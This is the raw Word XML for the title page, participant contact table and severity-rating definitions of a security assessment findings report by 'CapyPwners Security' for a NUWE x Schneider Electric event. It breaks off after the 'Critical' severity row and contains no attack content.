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D0B0F" w:rsidP="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="3E30BD24" w14:textId="1A4DE5BA" w14:noSpellErr="1">
      <w:pPr>
        <w:pStyle w:val="Ttulo"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD0B0F" w:rsidP="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="790B7174" w14:textId="77777777" w14:noSpellErr="1">
      <w:pPr>
        <w:pStyle w:val="Ttulo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD0B0F" w:rsidP="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="2A4CF2A1" w14:textId="3972CB2A" w14:noSpellErr="1">
      <w:pPr>
        <w:pStyle w:val="Ttulo"/>
      </w:pPr>
      <w:r w:rsidR="00BD0B0F">
        <w:drawing>
          <wp:inline wp14:editId="57C4D39E" wp14:anchorId="7F60D79E">
            <wp:extent cx="4591052" cy="4591052"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Imagen 2" descr="Nuwe - YouTub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706c216dfd5e41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1052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0F" w:rsidP="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="08229768" w14:textId="77777777" w14:noSpellErr="1">
      <w:pPr>
        <w:pStyle w:val="Ttulo"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="4C059340" w:rsidP="57C4D39E" w:rsidRDefault="4C059340" w14:paraId="7AE0E9A8" w14:textId="4F955574">
      <w:pPr>
        <w:pStyle w:val="Ttulo"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2124" w:right="0" w:firstLine="708"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="4C059340">
        <w:rPr/>
        <w:t>CapyPwners</w:t>
      </w:r>
      <w:r w:rsidR="4C059340">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="14CC7A70">
        <w:rPr/>
        <w:t>Security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007B1061" w:rsidR="00BD0B0F" w:rsidP="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="0FCE1714" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Ttulo"/>
      </w:pPr>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t>Security Assessment Findings Report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B15381" w:rsidRDefault="00B15381" w14:paraId="716D1F49" w14:textId="2A8762B9" w14:noSpellErr="1"/>
    <w:p w:rsidR="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="26E325EE" w14:textId="7332E350" w14:noSpellErr="1"/>
    <w:p w:rsidR="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="02477BB0" w14:textId="0B60B9BA" w14:noSpellErr="1"/>
    <w:p w:rsidR="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="18C1BD30" w14:textId="55939C23" w14:noSpellErr="1"/>
    <w:p w:rsidR="001131B3" w:rsidRDefault="001131B3" w14:paraId="1AD9DF15" w14:textId="334FDF7A" w14:noSpellErr="1"/>
    <w:p w:rsidR="001131B3" w:rsidRDefault="001131B3" w14:paraId="1A3D23AA" w14:textId="368DEA27" w14:noSpellErr="1"/>
    <w:p w:rsidR="001131B3" w:rsidRDefault="001131B3" w14:paraId="334250CB" w14:textId="77777777" w14:noSpellErr="1"/>
    <w:p w:rsidR="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="6710BFA4" w14:textId="77777777" w14:noSpellErr="1"/>
    <w:p w:rsidR="00BD0B0F" w:rsidP="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="60BF8A86" w14:textId="03E8E5C0">
      <w:pPr>
        <w:pStyle w:val="TitlePage-Version"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t>Date: November 19</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="00BD0B0F">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t>, 2022</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="50550650" w14:textId="68E00D84" w14:noSpellErr="1"/>
    <w:p w:rsidRPr="00CB5702" w:rsidR="00BD0B0F" w:rsidP="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="73AC947C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc119432373" w:id="0"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="00BD0B0F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Contact Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1872"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidRPr="009A75E9" w:rsidR="00BD0B0F" w:rsidTr="57C4D39E" w14:paraId="0E1A43F9" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidRPr="009A75E9" w:rsidR="00BD0B0F" w:rsidP="00F75CA0" w:rsidRDefault="00BD0B0F" w14:paraId="3EC94F95" w14:textId="77777777" w14:noSpellErr="1">
            <w:pPr>
              <w:pStyle w:val="BodyBlockLabelnonTOC"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidRPr="000E1783" w:rsidR="00BD0B0F" w:rsidP="00F75CA0" w:rsidRDefault="00BD0B0F" w14:paraId="4BFEEEC1" w14:textId="77777777" w14:noSpellErr="1"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BD0B0F" w:rsidP="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="20AE637A" w14:textId="77777777" w14:noSpellErr="1">
      <w:pPr>
        <w:pStyle w:val="Spacer"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:tblInd w:w="-7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2160"/>
        <w:gridCol w:w="2970"/>
        <w:gridCol w:w="4950"/>
      </w:tblGrid>
      <w:tr w:rsidRPr="009A75E9" w:rsidR="00BD0B0F" w:rsidTr="57C4D39E" w14:paraId="26429CE3" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0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:rsidRPr="009A75E9" w:rsidR="00BD0B0F" w:rsidP="00F75CA0" w:rsidRDefault="00BD0B0F" w14:paraId="5D2B05C0" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="Table-HeaderText"/>
            </w:pPr>
            <w:r w:rsidR="00BD0B0F">
              <w:rPr/>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2970" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0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:rsidRPr="009A75E9" w:rsidR="00BD0B0F" w:rsidP="00F75CA0" w:rsidRDefault="00BD0B0F" w14:paraId="56888D10" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="Table-HeaderText"/>
            </w:pPr>
            <w:r w:rsidR="00BD0B0F">
              <w:rPr/>
              <w:t>Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4950" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0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:rsidRPr="009A75E9" w:rsidR="00BD0B0F" w:rsidP="00F75CA0" w:rsidRDefault="00BD0B0F" w14:paraId="4F987162" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="Table-HeaderText"/>
            </w:pPr>
            <w:r w:rsidR="00BD0B0F">
              <w:rPr/>
              <w:t xml:space="preserve">Contact </w:t>
            </w:r>
            <w:r w:rsidR="00BD0B0F">
              <w:rPr/>
              <w:t>Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="009A75E9" w:rsidR="00BD0B0F" w:rsidTr="57C4D39E" w14:paraId="0519F99E" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="000B34FB" w:rsidR="00BD0B0F" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="52EA6463" w14:textId="6685F994">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="00BD0B0F">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>NUWE x Schneider Electric</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="00BD0B0F">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="009A75E9" w:rsidR="00BD0B0F" w:rsidTr="57C4D39E" w14:paraId="1EED3771" w14:textId="77777777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:rsidRPr="009A75E9" w:rsidR="00BD0B0F" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="5089D918" w14:textId="32E1D3F0">
            <w:pPr>
              <w:pStyle w:val="TableText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0561C9C6">
              <w:rPr/>
              <w:t>revbeef</w:t>
            </w:r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:rsidRPr="009A75E9" w:rsidR="00BD0B0F" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="535A5E7C" w14:textId="1F2D2FC8">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidR="0561C9C6">
              <w:rPr/>
              <w:t>Participant</w:t>
            </w:r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:rsidRPr="009A75E9" w:rsidR="00BD0B0F" w:rsidP="00F75CA0" w:rsidRDefault="008F1064" w14:paraId="4CE7A30C" w14:textId="2740AEC2">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidR="008F1064">
              <w:rPr/>
              <w:t>Email</w:t>
            </w:r>
            <w:r w:rsidR="00BD0B0F">
              <w:rPr/>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="72B238BB">
              <w:rPr/>
              <w:t>karol.rzepka2.stud@pw.edu.pl</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="009A75E9" w:rsidR="00BD0B0F" w:rsidP="00F75CA0" w:rsidRDefault="008F1064" w14:paraId="6D66E1B1" w14:textId="511DAC5C">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidR="008F1064">
              <w:rPr/>
              <w:t>Github</w:t>
            </w:r>
            <w:r w:rsidR="00BD0B0F">
              <w:rPr/>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="6D227016">
              <w:rPr/>
              <w:t>https://github.com/krzepka</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="009A75E9" w:rsidR="00BD0B0F" w:rsidTr="57C4D39E" w14:paraId="6435CA3B" w14:textId="77777777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:rsidR="00BD0B0F" w:rsidP="00F75CA0" w:rsidRDefault="008F1064" w14:paraId="0D74B283" w14:textId="433D424A">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidR="23BC6E04">
              <w:rPr/>
              <w:t>zxcvwrs</w:t>
            </w:r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:rsidR="00BD0B0F" w:rsidP="00F75CA0" w:rsidRDefault="008F1064" w14:paraId="50F0F181" w14:textId="38DFA50C">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidR="008F1064">
              <w:rPr/>
              <w:t>Participant</w:t>
            </w:r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:rsidRPr="009A75E9" w:rsidR="008F1064" w:rsidP="008F1064" w:rsidRDefault="008F1064" w14:paraId="4E57A4A5" w14:textId="53C3ECCD">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidR="008F1064">
              <w:rPr/>
              <w:t>Email</w:t>
            </w:r>
            <w:r w:rsidR="008F1064">
              <w:rPr/>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="0726D9B0">
              <w:rPr/>
              <w:t>wolertr@gmail.com</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="009A75E9" w:rsidR="00BD0B0F" w:rsidP="008F1064" w:rsidRDefault="008F1064" w14:paraId="7A428002" w14:textId="19D8EA1F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidR="008F1064">
              <w:rPr/>
              <w:t>Github</w:t>
            </w:r>
            <w:r w:rsidR="008F1064">
              <w:rPr/>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidR="28A6A16F">
              <w:rPr/>
              <w:t xml:space="preserve"> https://github.com/zxcvwrs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="009A75E9" w:rsidR="00BD0B0F" w:rsidTr="57C4D39E" w14:paraId="1239B7DD" w14:textId="77777777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:rsidR="00BD0B0F" w:rsidP="00F75CA0" w:rsidRDefault="008F1064" w14:paraId="7E9C1CDC" w14:textId="46D92281">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidR="26B9CDF7">
              <w:rPr/>
              <w:t>fortis1</w:t>
            </w:r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:rsidR="00BD0B0F" w:rsidP="00F75CA0" w:rsidRDefault="008F1064" w14:paraId="460C258C" w14:textId="77D31E00">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidR="008F1064">
              <w:rPr/>
              <w:t>Participant</w:t>
            </w:r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:rsidRPr="009A75E9" w:rsidR="008F1064" w:rsidP="008F1064" w:rsidRDefault="008F1064" w14:paraId="71EF6E9D" w14:textId="456B7AC0">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidR="008F1064">
              <w:rPr/>
              <w:t>Email</w:t>
            </w:r>
            <w:r w:rsidR="008F1064">
              <w:rPr/>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="6907E391">
              <w:rPr/>
              <w:t>mateuszmianovany@gmail.com</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidRPr="009A75E9" w:rsidR="00BD0B0F" w:rsidP="008F1064" w:rsidRDefault="008F1064" w14:paraId="0F2825AB" w14:textId="249FDD8C">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidR="008F1064">
              <w:rPr/>
              <w:t>Github</w:t>
            </w:r>
            <w:r w:rsidR="008F1064">
              <w:rPr/>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="1492285C">
              <w:rPr/>
              <w:t>https://github.com/f0rtis1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="25FB5569" w14:textId="18C1A559"/>
    <w:p w:rsidR="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="767374B7" w14:textId="465182AC" w14:noSpellErr="1"/>
    <w:p w:rsidR="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="400ED36E" w14:textId="13D1FFBA" w14:noSpellErr="1"/>
    <w:p w:rsidR="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="7A4C3119" w14:textId="58048491" w14:noSpellErr="1"/>
    <w:p w:rsidR="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="405E8B83" w14:textId="061AFC75" w14:noSpellErr="1"/>
    <w:p w:rsidR="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="5453BC24" w14:textId="2B658E4A" w14:noSpellErr="1"/>
    <w:p w:rsidR="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="72108538" w14:textId="7ED3BB76" w14:noSpellErr="1"/>
    <w:p w:rsidR="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="1BCBA378" w14:textId="6E4AE0F9" w14:noSpellErr="1"/>
    <w:p w:rsidR="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="49A59B01" w14:textId="71385A97" w14:noSpellErr="1"/>
    <w:p w:rsidR="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="19F83BE8" w14:textId="631F003B" w14:noSpellErr="1"/>
    <w:p w:rsidR="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="3758C62E" w14:textId="63B79805" w14:noSpellErr="1"/>
    <w:p w:rsidR="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="154FD255" w14:textId="3244CA8A" w14:noSpellErr="1"/>
    <w:p w:rsidR="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="141AEACD" w14:textId="67AE65B4" w14:noSpellErr="1"/>
    <w:p w:rsidR="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="2880A32D" w14:textId="6A00C7B1" w14:noSpellErr="1"/>
    <w:p w:rsidR="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="3AF9C30B" w14:textId="1ABC4C7F" w14:noSpellErr="1"/>
    <w:p w:rsidR="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="44CF7343" w14:textId="2F41F75A" w14:noSpellErr="1"/>
    <w:p w:rsidR="008F1064" w:rsidRDefault="008F1064" w14:paraId="10BB1210" w14:textId="73B0A589" w14:noSpellErr="1"/>
    <w:p w:rsidR="008F1064" w:rsidRDefault="008F1064" w14:paraId="5ACB5BAC" w14:textId="4688CCB2" w14:noSpellErr="1"/>
    <w:p w:rsidR="008F1064" w:rsidRDefault="008F1064" w14:paraId="0921A222" w14:textId="6A55A12E" w14:noSpellErr="1"/>
    <w:p w:rsidR="008F1064" w:rsidRDefault="008F1064" w14:paraId="72154FB4" w14:textId="369F9F1B" w14:noSpellErr="1"/>
    <w:p w:rsidR="008F1064" w:rsidRDefault="008F1064" w14:paraId="24A7AC3F" w14:textId="4F87B3C5" w14:noSpellErr="1"/>
    <w:p w:rsidR="008F1064" w:rsidRDefault="008F1064" w14:paraId="24085FF7" w14:textId="157AED3B" w14:noSpellErr="1"/>
    <w:p w:rsidR="00BD0B0F" w:rsidP="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="1A0813A0" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc119432374" w:id="1"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="00BD0B0F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Finding Severity</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="00BD0B0F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="00BD0B0F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ratings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00BD0B0F" w:rsidP="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="42E5987F" w14:textId="77777777" w14:noSpellErr="1"/>
    <w:p w:rsidRPr="00443936" w:rsidR="00BD0B0F" w:rsidP="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="7D1822E4" w14:textId="77777777">
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t xml:space="preserve"> table defines </w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t>levels</w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t>severity</w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t>corresponding</w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t xml:space="preserve"> CVSS score </w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t>range</w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t>used</w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t>throughout</w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t>document</w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t>assess</w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t>risk</w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t>impact</w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD0B0F" w:rsidP="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="21FF6E1B" w14:textId="77777777" w14:noSpellErr="1">
      <w:pPr>
        <w:pStyle w:val="Spacer"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD0B0F" w:rsidP="00BD0B0F" w:rsidRDefault="00BD0B0F" w14:paraId="5F2FBD3A" w14:textId="77777777" w14:noSpellErr="1">
      <w:pPr>
        <w:pStyle w:val="Spacer"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10074" w:type="dxa"/>
        <w:tblInd w:w="-7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84"/>
        <w:gridCol w:w="1620"/>
        <w:gridCol w:w="6570"/>
      </w:tblGrid>
      <w:tr w:rsidRPr="005B7603" w:rsidR="00BD0B0F" w:rsidTr="57C4D39E" w14:paraId="6C70DB68" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="170"/>
          <w:tblHeader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08080" w:themeFill="background1" w:themeFillShade="80"/>
            <w:tcMar/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00417AD5" w:rsidR="00BD0B0F" w:rsidP="00F75CA0" w:rsidRDefault="00BD0B0F" w14:paraId="457B357C" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="Table-HeaderText"/>
            </w:pPr>
            <w:r w:rsidR="00BD0B0F">
              <w:rPr/>
              <w:t>Severity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08080" w:themeFill="background1" w:themeFillShade="80"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidRPr="00417AD5" w:rsidR="00BD0B0F" w:rsidP="00F75CA0" w:rsidRDefault="00BD0B0F" w14:paraId="22BFA09A" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="Table-HeaderText"/>
            </w:pPr>
            <w:r w:rsidR="00BD0B0F">
              <w:rPr/>
              <w:t>CVSS V3 Score Range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08080" w:themeFill="background1" w:themeFillShade="80"/>
            <w:tcMar/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00417AD5" w:rsidR="00BD0B0F" w:rsidP="00F75CA0" w:rsidRDefault="00BD0B0F" w14:paraId="2C810385" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="Table-HeaderText"/>
            </w:pPr>
            <w:r w:rsidR="00BD0B0F">
              <w:rPr/>
              <w:t>Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="005B7603" w:rsidR="00BD0B0F" w:rsidTr="57C4D39E" w14:paraId="7FD985E7" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="709"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0000"/>
            <w:tcMar/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="005B7603" w:rsidR="00BD0B0F" w:rsidP="00F75CA0" w:rsidRDefault="00BD0B0F" w14:paraId="409E19AB" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="BodyBlockLabelnonTOC"/>
            </w:pPr>
            <w:r w:rsidR="00BD0B0F">
              <w:rPr/>
              <w:t>Critical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0C4B9CC0" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableText-Small"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidR="00BD0B0F">
              <w:rPr/>
              <w:t>9.0-10.0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386467" w:rsidR="00BD0B0F" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="4BC92D3E" w14:textId="77777777">
            <w:pPr>
              <w:pStyle w:val="TableText-Small"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="00BD0B0F">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Exploitation is straightforward and usually results in system-level compromise.  It is advised to form a plan of action and patch immediately.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
